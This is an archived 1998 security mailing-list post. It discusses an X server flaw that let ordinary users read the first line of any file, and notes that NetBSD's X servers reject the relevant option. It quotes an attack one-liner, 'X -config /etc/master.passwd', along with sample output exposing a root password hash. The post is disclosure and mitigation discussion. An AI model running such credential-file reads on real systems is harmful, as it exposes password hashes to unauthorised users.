Subject: None
To: None <tech-security@netbsd.org>
From: Simon Burge <simonb@telstra.com.au>
List: tech-security
Date: 10/17/1998 17:17:39
It doesn't seem that the X servers that come with NetBSD have the
"-config" option.  Even trying other command-line options (-co, -sp)
that take filenames gives errors like:

	Couldn't open RGB_DB '/etc/master.passwd'

This was tried on a pmax, a shark and an i386.

Simon.
--
On Sat, 17 Oct 1998 16:16:33 +1000  Darren Reed wrote:

> From owner-freebsd-security@FreeBSD.ORG Fri Oct 16 15:28:13 EST 1998 remote from cheops
> Date: Fri, 16 Oct 1998 18:08:02 +1300 (NZDT)
> From: Andrew McNaughton <andrew@squiz.co.nz>
> X-Sender: andrew@aniwa.sky
> Reply-To: andrew@squiz.co.nz
> To: security@FreeBSD.ORG
> Subject: X allows ordinary user to read first line of any file
> Message-Id: <Pine.BSF.4.01.9810161756550.706-100000@aniwa.sky>
> Mime-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Sender: avalon
> X-Loop: FreeBSD.org
> 
> 
> Found this on http://www.hoobie.net/security/exploits/
> 
> joeuser@host$ X -config /etc/master.passwd
> Unrecognized option: root:yd0Rj.v.r1wKA:0:0::0:0:Charlie
> use: X [:<display>] [option]
> .
> .
> .
> 
> I'm sure there are other files where this can be a problem, but in the case
> of the password file it seems wise to have a dummy entry as the first line
> of the master.passwd file.
> 
> 
> Andrew McNaughton